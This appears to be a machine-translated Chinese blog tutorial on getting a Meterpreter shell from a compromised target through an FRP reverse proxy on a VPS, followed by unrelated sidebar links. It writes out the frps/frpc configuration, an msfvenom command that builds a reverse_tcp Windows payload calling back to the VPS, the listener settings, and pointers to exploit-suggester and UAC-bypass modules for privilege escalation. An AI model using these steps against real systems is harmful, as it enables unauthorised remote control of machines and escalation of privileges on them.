当前位置:网站首页>FRP reverse proxy +msf get shell
FRP reverse proxy +msf get shell
2022-07-03 00:15:00 【Lomi only bear】
0x00: brief introduction frp Is a reverse proxy tool . You can easily penetrate the intranet . Provide services to the Internet ,frp Support tcp agreement , http agreement , https Equal agreement type , also web Service supports routing and forwarding based on domain name .
0x01: Environmental accountability
Drone aircraft :x.x.174.171( Hereinafter referred to as target )
kali:192.168.1.106( Hereinafter referred to as kali)
vps:x.x.193.94( Hereinafter referred to as vps)
Obtained in the target webshell
0x02: Start reverse
One 、 stay vps Downloading in frp And edit frps.ini
vim frps.ini
#frp Connection port between server and client ,frps and frpc It has to be consistent bind_port = 7000
start-up frps:./frps -c ./frps.ini
Two 、 stay kali Downloading in frp And edit frpc.ini
vim frpc.ini
[common] server_addr = x.x.193.94 server_port = 7000 #frpc Work port , Must match the above frps bring into correspondence with [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 # Forward to this machine 5555 remote_port = 6000 # The service side with 6000 Port forward to local
start-up frpc:./frpc -c ./frpc.ini
here frp The reverse proxy is finished , Let's start with MSF Horse making and setting monitoring .
3、 ... and 、MSF Make a horse
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe
Notice here :
lport The port of is you frpc.ini Inside remote_port = 6000 port
Four 、 Set listening 、 perform msf Horse
Notice here :
set lhost 127.0.0.1 # Set listening ip, It has to be with frpc Medium local_ip Agreement set lport 5555 # Set listening port , And frpc Medium local_port Agreement
Go to the target plane to execute i.exe
Observe vps Upper frp
Observe local kali
Obtained shell
tips: Built-in module Local Exploit Suggester. This module can help us identify which vulnerabilities in the system can be exploited , And provide us with the most suitable exp, Through this exp We can further raise our rights .
My most commonly used bypassuac modular
exploit/windows/local/bypassuac
边栏推荐
猜你喜欢
CADD course learning (4) -- obtaining proteins without crystal structure (Swiss model)
Bean加载控制
流媒体技术优化
67 page overall planning and construction plan for a new smart city (download attached)
接口差异测试——Diffy工具
Improvement of RTP receiving and sending PS stream tool (II)
基于OpenCV实现口罩识别
TypeError: Cannot read properties of undefined (reading ***)
MySQL advanced learning notes (III)
Dishes launcher small green program and directory management (efficiency tool)
随机推荐
What are the recommended thesis translation software?
Open source | Wenxin big model Ernie tiny lightweight technology, which is accurate and fast, and the effect is fully open
yolov5test. Py comment
How to write the design scheme of the thesis?
JDBC練習案例
Architecture: database architecture design
MySQL Foundation
RTP 接发ps流工具改进(二)
[Verilog tutorial]
Define MySQL function to realize multi module call
MySQL基础
開源了 | 文心大模型ERNIE-Tiny輕量化技術,又准又快,效果全開
Where can I find foreign papers?
开源了 | 文心大模型ERNIE-Tiny轻量化技术,又准又快,效果全开
Chapter 3 of getting started with MySQL: database creation and operation
[reading notes] phased summary of writing reading notes
JDBC tutorial
Develop knowledge points
Which websites can I search for references when writing a thesis?
英文论文有具体的格式吗?